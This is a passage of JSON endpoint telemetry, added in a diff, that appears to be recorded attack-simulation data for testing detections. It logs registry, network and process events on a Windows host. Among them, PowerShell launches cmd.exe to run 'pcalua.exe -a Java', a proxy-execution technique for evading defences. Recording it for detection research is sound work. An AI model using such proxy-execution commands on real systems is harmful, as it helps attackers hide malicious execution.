"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 6784, + "process_name": "AUDIODG.EXE", + "process_path": 
"C:\\WINDOWS\\system32\\AUDIODG.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", + "registry_value": "Properties", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573977140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573977300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "Windows.Media.Devices.dll", + "image_path": "C:\\Windows\\System32\\Windows.Media.Devices.dll", + "pid": 6784, + "process_name": "audiodg.exe", + "process_path": "C:\\Windows\\System32\\audiodg.exe", + "timestamp": 131883573976990000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573977330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573977330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573977330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573977330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "destination_address": "0:0:0:0:0:0:0:1", + "destination_port": "135", + "event_type": "network", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "protocol": "tcp", + "source_address": "0:0:0:0:0:0:0:1", + "source_port": "50509", + "subtype": "outgoing", + "timestamp": 131883573971910000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "destination_address": "0:0:0:0:0:0:0:1", + "destination_port": "50509", + "event_type": "network", + "pid": 928, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "protocol": "tcp", + 
"source_address": "0:0:0:0:0:0:0:1", + "source_port": "135", + "subtype": "incoming", + "timestamp": 131883573971920000, + "unique_pid": "{42FC7E13-B293-5C05-0000-001038180100}", + "user": "NT AUTHORITY\\NETWORK SERVICE", + "user_domain": "NT AUTHORITY", + "user_name": "NETWORK SERVICE" + }, + { + "destination_address": "0:0:0:0:0:0:0:1", + "destination_port": "49667", + "event_type": "network", + "pid": 2812, + "process_name": "schtasks.exe", + "process_path": "C:\\Windows\\System32\\schtasks.exe", + "protocol": "tcp", + "source_address": "0:0:0:0:0:0:0:1", + "source_port": "50510", + "subtype": "outgoing", + "timestamp": 131883573971940000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "destination_address": "0:0:0:0:0:0:0:1", + "destination_port": "50510", + "event_type": "network", + "pid": 1408, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "protocol": "tcp", + "source_address": "0:0:0:0:0:0:0:1", + "source_port": "49667", + "subtype": "incoming", + "timestamp": 131883573971940000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_value": "Journal", + "timestamp": 131883573997490000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + 
"registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", + "registry_value": "Render", + "timestamp": 131883573997490000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574007050000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A", + "registry_value": "W32:000000000008056A", + "timestamp": 131883574007350000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "process", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "subtype": "terminate", + "timestamp": 131883574007350000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", + "registry_path": 
"HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", + "registry_value": "pcalua.exe", + "timestamp": 131883574007350000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574007350000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883574007520016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883574007520016, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883574007520016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883574007520016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883574007520016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 5824, + "process_name": "SearchIndexer.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", + "registry_value": "NewClientID", + "timestamp": 131883574007520016, + "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", + "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", + "timestamp": 131883574007670000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "process", + "pid": 7004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883574007670000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"pcalua.exe -a Java\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7060, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883574007730000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7060, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574007670000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7060, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574007670000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" + }, + 
{ + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7060, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574007670000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7060, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574007670000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7060, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883574007670000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" + }, + { + "event_type": "file", + "file_name": "PCALUA.EXE-5EB8CBC1.pf", + "file_path": "C:\\Windows\\Prefetch\\PCALUA.EXE-5EB8CBC1.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883574007670000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "registry", + "pid": 7060, + "process_name": "cmd.exe", + "process_path": "C:\\WINDOWS\\system32\\cmd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", + "registry_value": "pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" + }, + { + "command_line": "pcalua.exe -a Java", + "event_type": "process", + "logon_id": 217055, + 
"parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5020, + "ppid": 7060, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "subtype": "create", + "timestamp": 131883574007840000, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}", + "unique_ppid": "{42FC7E13-CC18-5C05-0000-0010D2505701}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "pcalua.exe", + "image_path": "C:\\Windows\\System32\\pcalua.exe", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 
131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 5020, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883574007830016, + "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": 